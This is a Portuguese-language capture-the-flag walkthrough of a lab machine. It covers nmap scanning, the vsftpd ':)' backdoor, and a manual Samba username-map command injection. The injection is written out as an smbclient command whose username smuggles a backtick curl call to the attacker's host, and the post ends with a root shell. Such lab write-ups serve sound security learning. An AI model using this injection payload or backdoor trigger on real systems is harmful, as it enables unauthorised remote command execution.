Inicio
Vamos começar com o padrão de sempre, criando um diretório, e depois executando o nmap
nmap -sV -sC -oA nmap/initial 10.10.10.3
nmap -sV para enumerar as versões -sC para utilizar os scripts padrões do nmap -oA para salvar o output em um arquivo e chamar ele de inicial
-sV Enumerar as versões
-sC Scripts padrões
-oA Salvar output em todos os formatos
Vamos analisar cada linha para entender o que você precisa anotar e o que normalmente chama a atenção;
Porta 21 mostra FTP, FTP é um serviço para transferência de arquivos, então sempre tentamos o login anônimo. Talvez conseguimos recuperar alguma coisa. O Nmap inclusive avisa que esse tipo de login está habilitado.
A porta 22 é raramente uma porta de entrada, essa porta não tem um histórico de ser vulnerável. mas de qualquer forma vamos anotar a versão.
A parte boa do SSH é que ele nos mostra o possível sistema operacional da máquina
Agora vamos para 139 e 445;
SMB é notável pela falta de segurança então essas portas São DEFINITIVAMENTE algo que você sempre da uma atenção especial para elas.
FTP
Primeiro vamos testar aquele login Anônimo;
ftp 10.10.10.3
O usuário é anonymous, anônimo em inglês, e a senha não importa pode digitar qualquer coisa.
Não tem nenhum arquivo aqui, mas é sempre interessante pois se acharmos alguma forma do sistema executar um arquivo colocar ele através do FTP é ótimo!
Ainda não terminamos com o FTP, nós temos uma versão do serviço, então eu vou utilizar o searchsploit para procurar alguma vulnerabilidade.
Essa versão do ftpd é famosa por conter um backdoor, esse backdoor entrou na versão através de um arquivo adicionado aos downloads do VsFTPD.
Então para ativar essa vulnerabilidade precisamos apenas chamar esse backdoor através de uma função chamada vsf_sysutil_extra();
Para ativar ele é muito simples, é só conectar ao ftp utilizando o NC e no seu usuário adicionar “:)” (Irônico?)
Se funcionou a gente pode se conectar a uma nova porta 6200 no sistema.
Mas não é o caso, provavelmente tem um firewall no sistema que está bloqueando essa porta
A ideia é simples, nem sempre funciona! E quando isso acontecer, tente novamente. Tente outro jeito.
Eu poderia ter utilizado o MetaSploit para atacar essa vulnerabilidade, mas antes aprender exatamente o que ele está fazendo.
A beleza é essa, resolver o enigma, nem sempre a solução obvia é a correta. Mas a recompensa quando você consegue, é incomparável.
Smb
Como o FTP o smb também tem um login anônimo padrão dele, caso esteja habilitado talvez podemos encontrar algo.
Vou utilizar o smbmap
smbmap -H 10.10.10.3
Me parece que temos acesso somente a uma pasta, conectando ela com o smbclient
Nada de interessante aqui
Vamos para a versão e procurar ela no searchsploit.
Essa script é do Metasploit(Tem o nome e .rb), você poderia simplesmente roda ele e cruzar os dedos. Mas é sempre melhor analisar antes, entender o que ele está fazendo.
Vou baixar o script utilizando -m de Mirror ou copiar
Todo o começo é apenas texto mas no final vemos o exploit mesmo.
Ele define um username como nohup e depois um payload, nohup é uma forma de executar um comando fora do contexto atual, nesse caso o smb, senha é só algo aleatório de 16 caracteres
Em vez de executar ele pelos metasploit, vamos tentar manualmente. É um exploit fácil de replicar
smbclient //10.10.10.3/tmp -U './=`nohup curl http://SEU-IP`'
Vou tentar um curl inicialmente para testar se funciona mesmo, esse é uma boa maneira de saber se o sistema está te atingindo. Antes de executar eu vou iniciar um servidor com o python http
Parece que o sistema está deixando as letras maiúsculas, como o comando é Case-Sensitive isso faz diferença e provavelmente não vai funcionar
Vou procurar outra forma de utilizar um login, talvez usando outra maneira de passar o usuário a gente consiga.
na documentação com um CTRL+F me mostra que logon aparentemente tem um input de Username, esse comando parece ser uma troca de usuário como um “su” podemos utilizar o login anterior e trocar para o payload
O curl deu certo vamos tentar uma reverse shell
Precisa de um TTY
E Somos ROOT, aqui está a flag:
Hoje é só!
Lembra que eu sempre faço vídeos desses Blogs no meu canal do Youtube. Aguardo você lá!
Um Grande Abraço de Urso e TCHAU!